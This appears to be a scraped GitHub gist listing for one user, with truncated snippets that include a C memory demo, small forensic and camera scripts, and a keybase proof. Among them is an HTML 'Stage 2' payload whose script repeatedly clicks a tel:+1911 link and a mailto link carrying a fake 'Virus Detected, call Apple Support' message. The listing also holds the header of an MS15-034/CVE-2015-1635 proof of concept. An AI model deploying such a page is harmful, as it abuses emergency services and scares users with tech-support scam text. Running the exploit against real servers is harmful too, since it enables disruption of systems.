PPB: http://relay.broadcastify.com/37813088.mp3 PFD: http://relay.broadcastify.com/651178831.mp3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
int main() { | |
int stack = 10; | |
int* heap = malloc(sizeof(int)); | |
printf("stack = %p\nheap = %p\n\n", &stack, heap); | |
return 0; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!-- Stage 2: payload from meetdesai.com/ipas/+&cd=2&hl=en&ct=clnk&gl=us | |
this is the stage that either calls folks, or opens mails to desai, or both. --> | |
<h1>LOLOLOLOLOLOLOL</h1> | |
<a href="tel:+1911" id="tel"></a> | |
<a href="mailto:[email protected]?subject=Virus Detected!&body=We detected a Virus on your device! Call Apple Support now!" id="mail"></a> | |
<script> | |
for(i=0;i<10100101010010101001010100101001010;++i){ | |
document.getElementById("tel").click(); document.getElementById("mail").click(); | |
window.location = window.location; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Sets the date on a Veho VCC MUVI-PRO micro camera | |
# Usage: set_muvi_pro_date.sh /dev/sdb | |
mount "${1}" /mnt && | |
date +"%Y.%m.%d %H:%M:%S" > /mnt/time.txt && | |
umount /mnt |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# to install dependencies, run: pip install gspread IPy oauth2client | |
import json | |
import gspread | |
import sys | |
from IPy import IP | |
from oauth2client.client import SignedJwtAssertionCredentials as jwtassert |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
sqlite3 "${1}" <<! | |
.headers on | |
.mode csv | |
SELECT urls.url, urls.title, urls.visit_count, datetime(urls.last_visit_time / 1000000 + (strftime('%s', '1601-01-01')), 'unixepoch') | |
FROM urls, visits WHERE urls.id = visits.url; | |
! |
I hereby claim:
- I am maxrp on github.
- I am maxp (https://keybase.io/maxp) on keybase.
- I have a public key whose fingerprint is 260D 9167 F8D9 3913 3564 E571 7D96 4D33 6114 2ACF
To claim this, I am signing this object:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
## Usage: . new-case 'Investigating whacky happenstance.' | |
date=`date +%Y-%m-%d` | |
if [ -d $date ]; then | |
echo "Case ${date} exists." | |
cd $date | |
else | |
echo "Starting record for ${date}." |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
__author__ = "Max R.D. Parmer <[email protected]>" | |
""" | |
A moderately more consistent implementation of MS15-034/CVE-2015-1635 PoC | |
which is a bit more tolerant of redirects and SSL. | |
For best results, direct at a static file i.e. https://example.com/favico.ico | |
""" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/bash | |
while true; do cat loadbalancer-ips ; done | parallel --jobs 10 'bash sma.sh {} backend.example.com' |